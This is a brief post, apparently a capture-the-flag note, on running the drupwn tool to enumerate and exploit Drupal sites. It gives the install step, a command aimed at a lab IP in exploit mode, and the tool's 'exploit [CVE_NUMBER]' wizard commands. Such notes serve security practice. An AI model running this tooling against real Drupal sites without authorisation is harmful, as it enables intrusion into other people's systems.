Drupal Exploitation
Post

Drupal Exploitation

Drupal exploitation/enumeration

Github: drupwn

In order to make this exploit working first run the python setup.py script:

1
python setup.py install

Then run the enumeration/exploitation binary with this command:

1
./drupwn --target http://10.0.160.196 --mode <exploit/enum>

Finally use the wizard instructions:

1
Commands available: list | quit | check [CVE_NUMBER] | exploit [CVE_NUMBER]

Example: ECHO CTF tweek